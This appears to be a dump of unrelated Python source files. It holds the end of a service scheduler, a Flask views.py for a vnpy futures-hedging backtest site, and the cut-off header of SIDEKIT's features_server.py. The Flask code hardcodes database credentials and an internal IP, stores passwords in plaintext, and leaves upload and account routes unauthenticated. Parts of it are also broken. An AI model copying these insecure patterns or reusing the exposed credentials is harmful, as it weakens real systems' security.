SERVICES_ENABLED = [CONFIG.ombi_enabled, CONFIG.radarr_enabled, CONFIG.tautulli_enabled, CONFIG.unifi_enabled,
CONFIG.sonarr_enabled, CONFIG.sickchill_enabled]
if not [enabled for enabled in SERVICES_ENABLED if enabled]:
vl.logger.error("All services disabled. Exiting")
exit(1)
WORKER = Thread(target=thread)
WORKER.start()
schedule.run_all()
while schedule.jobs:
schedule.run_pending()
sleep(1)
|
views.py
|
# encoding: UTF-8
from flask import render_template,flash,url_for,session,redirect,request,g ,jsonify
from app import app, db,lm , celery
from flask_login import login_user, logout_user, current_user, login_required
from app.models import Post,User
from app.forms import LoginForm,EditForm,PostForm,SignUpForm,ChangeForm,SearchForm
from datetime import datetime
import os
import random
import time
import path
import json
import datetime
from vnpy.trader.app.ctaStrategy.ctaBacktesting import BacktestingEngine
from vnpy.trader.app.ctaStrategy.strategy.strategyDemo import strategyDemo
from vnpy.trader.app.ctaStrategy.strategy.strategyHedge import strategyHedge
from datetime import datetime
import pymongo
from threading import Thread
from queue import Queue
import xlrd
import pandas as pd
from pandas.core.frame import DataFrame
from client import getStrategyStart , getlogin,getAccountInfo,getPositionInfo,pushStrategyVar
#from setting import gateway_setting_dict
import numpy as np
from werkzeug.utils import secure_filename
queue = Queue()
wsdl_url = "http://localhost:8000/?wsdl"
@lm.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
@app.before_request
def before_request():
g.user = current_user
if g.user.is_authenticated:
g.user.last_seen = datetime.utcnow()
db.session.add(g.user)
db.session.commit()
@app.route('/',methods=['GET'])
@app.route('/index', methods = ['GET'])
@app.route('/index/<int:page>', methods = ['GET'])
@login_required
def index(page = 1): # page = 看一下这个 <int:page> 数据,打印看一下,
posts=Post.query.filter_by(user_id= current_user.id).order_by(db.desc(Post.time)).paginate(page,3, False)
return render_template('index.html',title='Home',user = current_user,posts = posts)
@app.route('/user/<username>')
@login_required
def user(username,page = 1):
user = User.query.filter_by(username = username).first()
posts=Post.query.filter_by(user_id = user.id).order_by(db.desc(Post.time)).paginate(page,3, False)
return render_template('user.html',user = user,posts = posts)
def drawLine(title,df,col):
from pyecharts import Line
if title == "NetValue":
pic = "单位净值"
if title == "Margin":
pic = "保证金"
line=Line(pic)
dates=df.index
for name in df.columns:
line.add(name,dates,df.loc[:,name])
#paramFilename='examples/WebTrader/app/templates/'+title +'.html'
#path=os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))))
#path=os.path.join(path,paramFilename)
path=u'E:/vnpy-master/vnpy-master/examples/WebTrader/app/templates/'+title +'.html'
if os.path.exists(path):
os.remove(path)
line.render(path)
def drawBar(title,df):
from pyecharts import Bar
if title == "ContractVol":
pic = "合约手数"
if title == "Var":
pic = "Var"
bar=Bar(pic)
dates=df.index
print dates
#paramFilename='examples/WebTrader/app/templates/'+title +'.html'
#path=os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))))
#path=os.path.join(path,paramFilename)
path=u'E:/vnpy-master/vnpy-master/examples/WebTrader/app/templates/'+title +'.html'
if os.path.exists(path):
os.remove(path)
for name in df.columns:
bar.add(name,dates,df.loc[:,name])
bar.render(path)
@app.route('/search_history_result/<col>',methods=['GET','POST'])#这个;能不能 把这个返回的结果放到 ajax请求的返回值里面;或者再使用一层ajax请求了;你看那种方便点
@login_required
def search_history_result(col):
print ' col:',col # 这个就是 name 然后用它把生成图像的数据 推送到 回测结果页面 search_history_result这个页面
# 返回回测完成 生成url的是哪一个函数的 ;
#post = Post.query.filter_by(id=col).first()
#query=post
#col=query
host, port = loadMongoSetting()
dbClient = pymongo.MongoClient(host, port)
dbClient.admin.authenticate("htquant", "htgwf@2018", mechanism='SCRAM-SHA-1')
db=dbClient.get_database('USERDATA_DB')
account=db.get_collection(col)
var=[]
col_vardf=col+'vardf'
account_vardf=db.get_collection(col_vardf)
for i in account_vardf.find():
i.pop('_id')
var.append(i)
vardf=pd.DataFrame(var)
vardf.index=vardf.iloc[:,0]
drawBar("Var",vardf)
num=[]
col_numdf=col+'numdf'
account_numdf=db.get_collection(col_numdf)
for i in account_numdf.find():
i.pop('_id')
num.append(i)
numdf=pd.DataFrame(num)
numdf.index=numdf.iloc[:,0]
drawBar("ContractVol",numdf)
nv=[]
col_nvdf=col+'nvdf'
account_nvdf=db.get_collection(col_nvdf)
for i in account_nvdf.find():
i.pop('_id')
nv.append(i)
nvdf=pd.DataFrame(nv)
nvdf.index=nvdf.iloc[:,0]
drawLine("NetValue",nvdf,col)
ptnv={'var':var}
margin=[]
col_margindf=col+'margindf'
account_margindf=db.get_collection(col_margindf)
for i in account_margindf.find():
i.pop('_id')
margin.append(i)
margindf=pd.DataFrame(margin)
margindf.index=margindf.iloc[:,0]
drawLine("Margin",margindf,col)
var=[]
opt = []
unhedged = []
unit = []
col_vardf=col+'vardf'
account_vardf=db.get_collection(col_vardf)
for i in account_vardf.find():
opt.append(i.values()[4])
unhedged.append (i.values()[1])
unit.append(i.values()[2])
#optnv=[]
#unhedgednv=[]
#unitnv=[]
#col_nvdf=col+'nvdf'
#account_nvdf=db.get_collection(col_nvdf)
#for i in account_nvdf.find():
#i.pop('_id')
#optnv.append([i[''].encode('ascii'),i[u"最优套保"]])
#unhedgednv.append([i[''].encode('ascii'),i[u"未对冲"]])
#unitnv.append([i[''].encode('ascii'),i[u"单位套保"]])
#optnum=[]
#unitnum=[]
#col_numdf=col+'numdf'
#account_numdf=db.get_collection(col_numdf)
#for i in account_numdf.find():
#i.pop('_id')
#optnum.append([i[''],i[u"最优套保"]])
#unitnum.append([i[''],i[u"单位套保"]])
#optmargin=[]
#unhedgedmargin=[]
#unitmargin=[]
#col_margindf=col+'margindf'
#account_margindf=db.get_collection(col_margindf)
#for i in account_margindf.find():
#print i
#i.pop('_id')
#optmargin.append([i[''],i[u"最优套保"]])
##unhedgedmargin.append([i[''],i["Unhedged"]])
#unitmargin.append([i[''],i[u"单位套保"]])
u=[]
col_hedgeResult = col + 'HedgeResult'
account_HedgeResultdf=db.get_collection(col_hedgeResult)
j = 0
for i in account_HedgeResultdf.find():
if j == 0 or j ==1 or j == 3:
f = round(i.values()[4],4)
f = str (f*100) +"%"
e = round(i.values()[1],4)
e = str (e*100) +"%"
g = round(i.values()[2],4)
g = str (g*100) +"%"
u.append([f,e,g])
if j>1 and j != 3:
u.append([i.values()[4],i.values()[1],i.values()[2]])
j= j+1
return render_template('search_history_result.html',u=u,opt=opt,unhedged= unhedged,unit= unit )
#return render_template('search_history_result.html',u=u,opt=opt,unhedged= unhedged,unit= unit ,optnv=optnv,unhedgednv=unhedgednv,unitnv=unitnv,optnum=optnum,unitnum=unitnum,
#optmargin=optmargin,unitmargin=unitmargin)
@app.route('/Var')
@login_required
def Var():
"""
三家数据折线图/柱状图页面
"""
# 计算数据
return render_template('Var.html')
@app.route('/Margin')
@login_required
def Margin():
return render_template('Margin.html')
@app.route('/ContractVol')
@login_required
def ContractVol():
return render_template('ContractVol.html')
@app.route('/NetValue')
@login_required
def NetValue():
return render_template('NetValue.html')
@app.route('/<index>/detail',methods=['GET','POST'])
@login_required
def detail(index):
post = Post.query.filter_by(id=index).first()
query=post.title
if request.method == 'POST':
if request.form['Post']=='Post':
return redirect(url_for('search_history_result',col=query)) #都是url 的方式 之前是先到detail页面 然后这样子转的 没有回测完成跳转的逻辑
elif request.method == 'GET':
return render_template('detail.html',title='Detail',post = post)
#@app.route('/write',methods=['GET','POST'])
#@login_required
#def write():
#form = PostForm()
#if form.validate_on_submit():
#post = Post(title=form.title.data,content = form.content.data,user_id = current_user.id)
#db.session.add(post)
#db.session.commit()
#flash('Your post is now live!')
#return redirect(url_for('index'))
#return render_template('write.html',title='Write',form=form)
@app.route('/upload', methods=['POST', 'GET'])
def upload():
if request.method == 'POST':
f = request.files['file']
basepath = os.path.dirname(__file__) # 当前文件所在路径
filename = str(current_user.id)+ 'gateway_setting.json'
upload_path = os.path.join(basepath, '',filename) #注意:没有的文件夹一定要先创建,不然会提示没有该路径
f.save(upload_path)
return redirect(url_for('upload'))
return render_template('upload.html')
@app.route('/accountManage')
def accountManage():
return render_template('accountManage.html')
@app.route('/mydict', methods=['GET', 'POST'])
def mydict():
print('login all account')
from utility import convert_file_to_dict
current_path = os.path.abspath(os.path.dirname(__file__))
# gateway
gateway_setting_name = str(current_user.id) + 'gateway_setting.json'
gateway_setting_location = os.path.join(current_path, gateway_setting_name)
gateway_setting_dict = convert_file_to_dict(gateway_setting_location)
accountstr = ''
for id,value in gateway_setting_dict.items():
accountID = value['accountID']
password = value['password']
brokerID = value['brokerID']
tdAddress = value['tdAddress']
mdAddress = value['mdAddress']
a = "'" + str(accountID) + ', '+"'"
accountstr = a +accountstr
info = getlogin(wsdl_url,accountID=accountID,password=password,brokerID=brokerID,tdAddress=tdAddress,mdAddress=mdAddress)
if request.method == 'POST':
a = request.form['mydata']
print(a)
a = "'" + str(accountID) + "'"
d = {'name': ' login successful', 'age': accountstr}
return jsonify(d)
# 查询所有账户
@app.route ('/mytable',methods = ['GET', 'POST'])
def mytable():
table = []
table.append(
('账号', '动态权益', '可用资金', '可用资金', '手续费', '平仓盈亏', '持仓盈亏', '静态权益'))
from utility import convert_file_to_dict
current_path = os.path.abspath(os.path.dirname(__file__))
# gateway
gateway_setting_name = str(current_user.id) + 'gateway_setting.json'
gateway_setting_location = os.path.join(current_path, gateway_setting_name)
gateway_setting_dict = convert_file_to_dict(gateway_setting_location)
for id, value in gateway_setting_dict.items():
info = getAccountInfo(wsdl_url, accountID=id)
table.append(info)
accountInfo = table[1:]
total = []
accountInfonew = []
for i in accountInfo :
accoutSt = i[1:]
accountInfonew.append(accoutSt)
for i in accountInfonew :
for j in i:
j = float(j)
for i in accountInfonew :
m =0
temp = []
for j in i:
temp.append(float(j))
if len(total)>6 :
total[m] =total[m] +temp[m]
else :
total.append(float(j))
m= m+1
total.insert(0,'账户信息汇总')
table.append(total)
data = json.dumps(table)
print(data)
return data
@app.route('/mytable2', methods=['GET', 'POST']) # 仓位获取
def mytable2():
table = []
n = 9
table.append(
('账号','合约代码', '交易所代码', '多单持仓量', '多单上日持仓', '多单今日持仓', '空单持仓量', '空单上日持仓', '空单今日持仓'))
from utility import convert_file_to_dict
current_path = os.path.abspath(os.path.dirname(__file__))
# gateway
gateway_setting_name = str(current_user.id) + 'gateway_setting.json'
gateway_setting_location = os.path.join(current_path, gateway_setting_name)
gateway_setting_dict = convert_file_to_dict(gateway_setting_location)
for id, value in gateway_setting_dict.items():
info = getPositionInfo(wsdl_url, accountID=id)
#info_cell = [info[i:i+n] for i in range(0, len(info), n)]
if len(info)>9:
for i in range(0, len(info), n ):
info_cell = info[i:i+n]
table.append(info_cell)
else:
table.append(info)
positionInfo = table[1:]
total = []
positionInfonew = []
for i in positionInfo :
if len(i)>2 :
accoutSt = i[1:]
positionInfonew.append(accoutSt)
# for i in positionInfonew :
# for j in i[2:]:
# j = float(j)
df = DataFrame(positionInfonew)
traindata = np.array(df[[2, 3, 4, 5, 6, 7]],dtype= np.float)
traindata = DataFrame(traindata)
traindata['symbol']=df[0]
traindata['exchange'] = df[1]
newdf = traindata.groupby(['symbol','exchange']).sum()
for index, row in newdf.iterrows():
totalpositon = row.tolist()
totalpositon.insert(0,index[1])
totalpositon.insert(0, index[0])
totalpositon.insert(0,u'按照标的汇总')
table.append(totalpositon)
data = json.dumps(table)
positionDf = DataFrame(table)
print(data)
return data
@app.route('/login',methods=['GET','POST'])
def login():
form = LoginForm()
if form.validate_on_submit():
user = User.login_check(request.form.get('username'),request.form.get('password'))
if user:
login_user(user)
user.last_seen = datetime.now()
try:
db.session.add(user)
db.session.commit()
except:
flash("The Database error!")
return redirect('/login')
flash('Your name: ' + request.form.get('username'))
flash('remember me? ' + str(request.form.get('remember_me')))
return redirect(url_for("index"))
else:
flash('Login failed, username or password error!')
return redirect('/login')
return render_template('login.html',form=form)
@app.route('/sign-up',methods=['GET','POST'])
def sign_up():
form = SignUpForm()
user = User()
if form.validate_on_submit():
user_name = request.form.get('username')
user_password = request.form.get('password')
register_check = User.query.filter(db.and_(User.username == user_name, User.password == user_password)).first()
if register_check:
return redirect('/sign-up')
if len(user_name) and len(user_password):
user.username = user_name
user.password = user_password
try:
db.session.add(user)
db.session.commit()
except:
return redirect('/sign-up')
return redirect('/index')
return render_template("sign_up.html",form=form)
@app.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for('index'))
@app.route('/edit', methods = ['GET', 'POST'])
@login_required
def edit():
form = EditForm(g.user.username)
if form.validate_on_submit():
g.user.username = form.username.data
g.user.brokerID = form.brokerID.data
g.user.mdAddress = form.mdAddress.data
g.user.tdAddress = form.tdAddress.data
g.user.userID = form.userID.data
g.user.password = form.password.data
db.session.add(g.user)
db.session.commit()
param = {}
param['brokerID'] = form.brokerID.data
param['mdAddress'] = g.user.mdAddress
param['tdAddress'] = g.user.tdAddress
param['userID'] = g.user.userID
param['password'] = g.user.password
print param
writeCTP_connect_json(param)
flash(u'您的修改已经保存')
return redirect(url_for('edit'))
form.username.data = g.user.username
#form.about_me.data = g.user.about_me
return render_template('edit.html',form = form)
@app.route('/delete/<post_id>',methods = ['POST'])
@login_required
def delete(post_id):
post = Post.query.filter_by(id = post_id).first()
db.session.delete(post)
db.session.commit()
flash("delete post successful!")
#return redirect(url_for('user',username=g.user.username))
posts=Post.query.filter_by(user_id= current_user.id).order_by(db.desc(Post.time))
return render_template('index.html',title='Home',user = current_user,posts = posts)
@app.route('/edit/<post_id>',methods = ['GET'])
@login_required
def editpost(post_id):
form = ChangeForm()
post = Post.query.filter_by(id = post_id).first()
form.title.data = post.title
form.content.data = post.content
return render_template('change.html',form = form,post_id=post.id)
@app.route('/change/<post_id>',methods = ['POST'])
@login_required
def change(post_id):
form = ChangeForm()
post = Post.query.filter_by(id = post_id).first()
if form.validate_on_submit():
post.title = form.title.data
print(post.title,post.content)
post.content = form.content.data
db.session.add(post)
db.session.commit()
flash('Your changes have been saved.')
return redirect(url_for('user',username=g.user.username))
#-----------------------------------------------------------------------------------------
#-----------------------------------------------------------------------------------------
@app.route('/paramInput',methods=['GET','POST'])
@login_required
def paramInput():
form = PostForm()
if form.validate_on_submit():
print "title1: ",form.title.data , request.form.get('starttime'),request.form.get('code'),request.form.get('direction') #request.form.get('direction')
code = request.form.get('code')
section2 = request.form.get('section2')
if code=="I":
spotID = section2[1:9]
else :
spotID = section2[0:8]
print u"现货",spotID
spotID = spotID.strip()
direction = request.form.get('direction')
if direction == u'持有多头':
direction = u'LongHedging'
else:
direction = u'ShortHedging'
volume = form.title.data
startdate = request.form.get('starttime')
enddate = request.form.get('endtime')
strategystartDate = request.form.get('strategystartDate')
period = form.content.data
strategyName = request.form.get('strategyName')
strategyChoice = request.form.get('strategyChoice')
code = code.encode('unicode-escape').decode('string_escape')
code = code.split('.')[0]
total= strategyName
#contents="\n策略命名:"+strategyName+"\n策略选择:"+strategyChoice +"\n合约代码:"+code+"\n现货数量:"+volume+"\nspotID:"+spotID+"\n调仓周期:"+period+"\n对冲方向:" \
#+direction+"\n数据加载日期:"+startdate+"\n策略开始日期:"+strategystartDate+"\n结束日期:"+enddate
contents=strategyName+"\n"+strategyChoice +"\n"+code+"\n"+volume+"\n"+spotID+"\n"+period+"\n" \
+direction+"\n"+startdate+"\n"+strategystartDate+"\n"+enddate
print 'name:',total , contents
post=Post(title=total,content = contents,user_id = current_user.id)
db.session.add(post)
db.session.commit()
print "finishing save data!!!!"
flash(u'您的修改已经保存')
return render_template('paramInput.html',title='paramInput',form=form)
#-------------------------------------------------------------------------------------------
# Celery configuration
@celery.task(bind=True)
def long_task(self,data):
"""Background task that runs a long function with progress reports."""
#开启线程监听回测日期
#queue = Queue()
print u'传参', data
data = str(data)
posts = db.session.query(Post).filter(Post.title ==data).first()
print u'传参posts',posts.content
para= posts.content
#重写本地json 因为现在策略要读取json 所以这里保存 以后要把参数直接传进策略
param = {}
code = para.splitlines()[2].decode('utf-8')
param['strategyname'] = data
param['symbol'] = para.splitlines()[2].decode('utf-8')
param['spotID'] = para.splitlines()[4].decode('utf-8')
param['Qs'] = para.splitlines()[3].decode('utf-8')
param['period'] = para.splitlines()[5].decode('utf-8')
param['direction'] = para.splitlines()[6].decode('utf-8')
param['datastartdate'] = para.splitlines()[7].decode('utf-8') # 数据日期
param['startdate'] = para.splitlines()[8].decode('utf-8') # 策略日期
param['enddate'] = para.splitlines()[9].decode('utf-8')
param['strategyName'] = para.splitlines()[0].decode('utf-8')
param['strategyChoice'] = para.splitlines()[1].decode('utf-8')
writeJson(param)
import datetime
#date_ = paramDate()
startdate= para.splitlines()[7]
lastdate=para.splitlines()[9]
startDate = time.strptime(startdate, "%Y-%m-%d")
endDate = time.strptime(lastdate, "%Y-%m-%d")
date1=datetime.datetime(startDate[0],startDate[1],startDate[2])
date2=datetime.datetime(endDate[0],endDate[1],endDate[2])
total = (date2 - date1).days
##s1 = Student(startdate= date_['startdate'],lastdate=date_['enddate'], queue=queue)
#s1 = Student(startdate='20170101' ,lastdate='20171230', queue=queue)
#s1.start()
#开启回测实例线程
c = Thread(target=producer)
c.start()
# 监听
message = 'hold on'
while True:
msg = queue.get()
if msg == "finish":
return {'current': 100, 'total': 100, 'status': 'Task completed!',
'result': 42}
else :
dt = time.strptime(msg, "%Y-%m-%d")
date3 = datetime.datetime(dt[0],dt[1],dt[2])
i = (date3 - date1).days
self.update_state(state='PROGRESS',
meta={'current': i, 'total': total,
'status': message})
print i ,total
time.sleep(1)
#if i == 99:
#print(u"{}:finish!".format(lastdate))
#return {'current': 100, 'total': 100, 'status': 'Task completed!',
#'result': 42}
#if dt == time.strptime(lastdate,"%Y-%m-%d"):
#print(u"{}:finish!".format(lastdate))
#return {'current': 100, 'total': 100, 'status': 'Task completed!',
#'result': 42}
# 生产者:回测线程
def producer():
#开启回测实例线程 该线程推送把回测的datetime数据推送到queue
engine = BacktestingEngine(queue=queue)
#..........实现回测.......
# 读取策略参数字典,为下一步读取合约做准备
engine.readParam_Setting()
# 设置回测日期
date_ = paramDate()
datastartdate= date_['datastartdate']
lastdate=date_['enddate']
engine.setStartDate(datastartdate, 0)
engine.setEndDate(lastdate)
#engine.setStartDate('20170103', 0)
#engine.setEndDate('20170213')
# 设置手续费
engine.setRate(0.3 / 10000) # 万0.3
# 在引擎中创建策略对象
#engine.initStrategy(strategyDemo, {})
engine.initStrategy(strategyHedge, {})
# 读取参数
symbol = date_['symbol']
symbolList = []
symbol = symbol.encode('unicode-escape').decode('string_escape')
symbolList.append(symbol.split('.')[0])
#symbolList = ['HC']
title = date_['strategyname']
engine.setDatabase(symbolList)
# 设置初始仓位
engine.setInitialPos(0)
engine.loadDailyHistoryData()
engine.hedgeResult()
host,port=loadMongoSetting()
dbClient = pymongo.MongoClient(host, port)
dbClient.admin.authenticate("htquant", "htgwf@2018", mechanism='SCRAM-SHA-1')
db=dbClient.get_database('USERDATA_DB')
# 先删除重名的
account=db.get_collection(title)
account.drop()
account=db.get_collection(title+'vardf')
account.drop()
account=db.get_collection(title+'nvdf')
account.drop()
account=db.get_collection(title+'margindf')
account.drop()
account=db.get_collection(title+'numdf')
account.drop()
account=db.get_collection(title+'HedgeResult')
account.drop()
#回测结果
col=db[title]
data=xlrd.open_workbook(r'E:\vnpy-master\vnpy-master\vnpy\trader\app\ctaStrategy\resultsDF.xlsx')
table=data.sheets()[0]
rowstag=table.row_values(0)
nrows=table.nrows
returnData={}
for i in range(1,nrows):
returnData[i]=json.dumps(dict(zip(rowstag,table.row_values(i))))
returnData[i]=json.loads(returnData[i])
col.insert(returnData[i])
#nvdf表单
col_nvdf=db[title+'nvdf']
data=xlrd.open_workbook(r'E:\vnpy-master\vnpy-master\vnpy\trader\app\ctaStrategy\nvDF.xlsx')
table=data.sheets()[0]
rowstag=table.row_values(0)
nrows=table.nrows
returnData={}
for i in range(1,nrows):
returnData[i]=json.dumps(dict(zip(rowstag,table.row_values(i))))
returnData[i]=json.loads(returnData[i])
col_nvdf.insert(returnData[i])
#vardf表单
col_vardf=db[title+'vardf']
data=xlrd.open_workbook(r'E:\vnpy-master\vnpy-master\vnpy\trader\app\ctaStrategy\varDF.xlsx')
table=data.sheets()[0]
rowstag=table.row_values(0)
nrows=table.nrows
returnData={}
for i in range(1,nrows):
returnData[i]=json.dumps(dict(zip(rowstag,table.row_values(i))))
returnData[i]=json.loads(returnData[i])
col_vardf.insert(returnData[i])
#numdf表单
col_numdf=db[title+'numdf']
data=xlrd.open_workbook(r'E:\vnpy-master\vnpy-master\vnpy\trader\app\ctaStrategy\numDF.xlsx')
table=data.sheets()[0]
rowstag=table.row_values(0)
nrows=table.nrows
returnData={}
for i in range(1,nrows):
returnData[i]=json.dumps(dict(zip(rowstag,table.row_values(i))))
returnData[i]=json.loads(returnData[i])
col_numdf.insert(returnData[i])
#margindf表单
col_margindf=db[title+'margindf']
data=xlrd.open_workbook(r'E:\vnpy-master\vnpy-master\vnpy\trader\app\ctaStrategy\marginDF.xlsx')
table=data.sheets()[0]
rowstag=table.row_values(0)
nrows=table.nrows
returnData={}
for i in range(1,nrows):
returnData[i]=json.dumps(dict(zip(rowstag,table.row_values(i))))
returnData[i]=json.loads(returnData[i])
col_margindf.insert(returnData[i])
#HedgeResult
col_margindf=db[title+'HedgeResult']
data=xlrd.open_workbook(r'E:\vnpy-master\vnpy-master\vnpy\trader\app\ctaStrategy\HedgeResult.xlsx')
table=data.sheets()[0]
rowstag=table.row_values(0)
nrows=table.nrows
returnData={}
for i in range(1,nrows):
returnData[i]=json.dumps(dict(zip(rowstag,table.row_values(i))))
returnData[i]=json.loads(returnData[i])
col_margindf.insert(returnData[i])
# 全部生成完毕,推送queue 完成信息
msg = 'finish'
queue.put(msg)
@app.route('/longtask', methods=['GET','POST'])
def longtask():
#global sid
sid =request.get_data() # 这里怎么调试
print u'页面',sid
task = long_task.apply_async([sid])
return jsonify({}), 202, {'Location': url_for('taskstatus',
task_id=task.id)}
@app.route('/status/<task_id>')
def taskstatus(task_id):
task = long_task.AsyncResult(task_id)
if task.state == 'PENDING':
response = {
'state': task.state,
'current': 0,
'total': 1,
'status': 'Pending...'
}
elif task.state != 'FAILURE':
response = {
'state': task.state,
'current': task.info.get('current', 0),
'total': task.info.get('total', 1),
'status': task.info.get('status', '')
}
if 'result' in task.info:
response['result'] = task.info['result']
else:
# something went wrong in the background job
response = {
'state': task.state,
'current': 1,
'total': 1,
'status': str(task.info), # this is the exception raised
}
return jsonify(response)
def loadMongoSetting():
"""载入MongoDB数据库的配置"""
fileName = 'VT_setting.json'
path = os.path.abspath(os.path.dirname(__file__))
fileName = os.path.join(path, fileName)
try:
f = file(fileName)
setting = json.load(f)
host = setting['mongoHost']
port = setting['mongoPort']
except:
host = '10.3.135.33'
port = 57012
return host, port
#-----------------------------
def loadDailyHistoryData(collection,query,region):
"""mongodb数据库数据"""
host, port = loadMongoSetting()
dbClient = pymongo.MongoClient(host, port)
dbClient.admin.authenticate("htquant", "htgwf@2018", mechanism='SCRAM-SHA-1')
code = collection.split('.')[0]
ID = region.split(" ")[0]
db=dbClient.get_database('SPOT_DB')
account=db.get_collection(code)
print "ID: ",ID ,"query:",query
u=[]
if code=='I':
for i in account.find({"Variety":query}):
u.append([i["ID"],i["Variety"],i["Grade"],i["Region"],i["Price"],i["Date"]])
else :
for i in account.find({"ID":ID}):
u.append([i["ID"],i["Variety"],i["Grade"],i["Region"],i["Price"],i["Date"]])
return u
@app.route('/searchResult/<query>?<collection>?<region>',methods=['GET','POST'])
@login_required
def searchResult(collection,query,region):
u=loadDailyHistoryData(collection,query,region)
return render_template('searchResult.html',u=u)
@app.route('/search',methods=['GET','POST'])
@login_required
def search():
form = SearchForm()
if request.method == 'POST':
print request.form.get('collection'),request.form.get('code'),request.form.get('region')
return redirect(url_for('searchResult',collection=request.form.get('collection'),query=request.form.get('code'),\
region=request.form.get('region')))
return render_template('search.html', title='Search', form=form)
#---------------------------------------------------------
#@app.route('/trader')
@login_required
def trader():
form = PostForm()
if form.validate_on_submit():
post = Post(title=form.title.data,content = form.content.data,user_id = current_user.id)
db.session.add(post)
db.session.commit()
flash('Your post is now live!')
return redirect(url_for('index'))
return send_file('./templates/trader.html')
#---------------------------------------------------
def paramDate():
paramFilename='vnpy/trader/app/ctaStrategy/strategy/strategyHedge_Param_Setting.json'
path=os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))))
path=os.path.join(path,paramFilename)
#加载策略变量
with open(path) as f:
param = json.load(f)
return param
def writeJson(param):
paramFilename='vnpy/trader/app/ctaStrategy/strategy/strategyHedge_Param_Setting.json'
path=os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))))
path=os.path.join(path,paramFilename)
with open(path, 'w') as f :
json.dump(param,f)
def writeCTP_connect_json(param):
path="E:/vnpy-master/vnpy-master/examples/WebTrader/CTP_connect.json"
with open(path, 'w') as f :
json.dump(param,f)
@app.route('/HedgeForm',methods=['GET','POST'])
@login_required
def HedgeForm():
import flask_excel
import pandas as pd
paramFilename='vnpy/trader/app/ctaStrategy/HedgeResult.csv'
path=os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))))
path=os.path.join(path,paramFilename)
import numpy as np
HedgeResult = pd.read_csv(path)
u = np.array(HedgeResult)
#for index , detail in u.items():
#u.append([detail[0],detail[1],detail[2],detail[3]])#,detail[4],detail[5],detail[6],detail[7]])
return render_template('HedgeFromResult.html',u=u)
#-------------------------------------------
"""监听线程"""
class Student(Thread):
def __init__(self, startdate, lastdate, queue):
import datetime
super(Student,self).__init__()
self.lastdate = lastdate
self.queue = queue
startDate = time.strptime(startdate, "%Y%m%d")
endDate = time.strptime(lastdate, "%Y%m%d")
date1=datetime.datetime(startDate[0],startDate[1],startDate[2])
date2=datetime.datetime(endDate[0],endDate[1],endDate[2])
total = (date2 - date1).days
def run(self):
while True:
# 监听回测程序
msg = self.queue.get()
#i = endDate - datetime.strptime(msg, "%Y-%m-%d")
dt = time.strptime(msg, "%Y-%m-%d")
date3 = datetime.datetime(dt[0],dt[1],dt[2])
i = (date2 - date3).days
self.update_state(state='PROGRESS',
meta={'current': i, 'total': total,
'status': message})
print "days : " ,i
#time.sleep(1)
# 到日期返回结束信息
if msg == self.lastdate:
print(u"{}:finish!".format(self.lastdate))
return {'current': 100, 'total': 100, 'status': 'Task completed!',
'result': 42}
|
features_server.py
|
# -*- coding: utf-8 -*-
#
# This file is part of SIDEKIT.
#
# SIDEKIT is a python package for speaker verification.
# Home page: http://www-lium.univ-lemans.fr/sidekit/
#
# SIDEKIT is a python package for speaker verification.
# Home page: http://www-lium.univ-lemans.fr/sidekit/
#
# SIDEKIT is free software: you can redistribute it and/or modify
# it under the terms of the GNU LLesser General Public License as
# published by the Free Software Foundation, either version 3 of the License,
# or (at your option) any later version.
#
# SIDEKIT is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with SIDEKIT. If not, see <http://www.gnu.org/licenses/>.
"""
Copyright 2014-2016 Sylvain Meignier and Anthony Larcher
:mod:`features_server` provides methods to manage features
"""
import os
import multiprocessing
import logging
from sidekit import PARALLEL_MODULE
from sidekit.frontend.features import *
from sidekit.frontend.vad import *
from sidekit.frontend.io import *
from sidekit.frontend.normfeat import *
from sidekit.sidekit_wrappers import *
import sys
import numpy as np
import ctypes
from sidekit.features_server import FeaturesServer
if sys.version_info.major == 3:
import queue as Queue
else:
import Queue
# import memory_profiler
__license__ = "LGPL"
__author__ = "Anthony Larcher"
__copyright__ = "Copyright 2014-2016 Anthony Larcher"
__maintainer__ = "Anthony Larcher"
__email__ = "anthony.larcher@univ-lemans.fr"
__status__ = "Production"
__docformat__ = 'reStructuredText'
class FeaturesServer_test(FeaturesServer):
"""
A class for acoustic feature management.
FeaturesServer should be used to extract acoustic features (MFCC or LFCC)
from audio files in SPHERE, WAV or RAW PCM format.
It can also be used to read and write acoustic features from and to disk
in SPRO4 or HTK format.
:attr input_dir: directory where to load audio or feature files
:attr input_file_extension: extension of the incoming files
:attrlabel_dir: directory where to read and write label files
:attr label_files_extension: extension of label files to read and write
:attr from_file: format of the input files to read, can be `audio`, `spro4`
or `htk`, for audio files, format is given by the extension
:attr config: pre-defined configuration for speaker diarization or recognition
in 8 or 16kHz. Default is speaker recognition 8kHz
:attr single_channel_extension: list with a single extension to add to
the audio filename when processing a single channel file.
Default is empty, means the feature file has the same speaker as
the audio file
:attr double_channel_extension: list of two channel extension to add
to the audio filename when processing two channel files.
Default is ['_a', '_b']
:attr sampling_frequency: sample frequency in Hz, default is None,
determine when reading the audio file
:attr lower_frequency: lower frequency limit of the filter bank
:attr higher_frequency: higher frequency limit of the filter bank
:attr linear_filters: number of linear filters to use for LFCC extraction
:attr log_filters: number of linear filters to use for MFCC extraction
:attr window_size: size of the sliding window in seconds
:attr shift: time shift between two feature vectors
:attr ceps_number: number of cepstral coefficients to extract
:attr snr: snr level to consider for SNR-based voice activity detection
:attr vad: type of voice activity detection to use, can be 'snr', 'energy'
(using a three Gaussian detector) or 'label' when reading the info from
pre-computed label files
:attr feat_norm: normalization of the acoustic features, can be
'cms' for cepstral mean subtraction, 'mvn' for mean variance
normalization or 'stg' for short term Gaussianization
:attr log_e: boolean, keep log energy
:attr delta: boolean, add the first derivative of the cepstral coefficients
:attr double_delta: boolean, add the second derivative of the cepstral
coefficients
:attr rasta: boolean, perform RASTA filtering
:attr keep_all_features: boolean, if False, only features labeled as
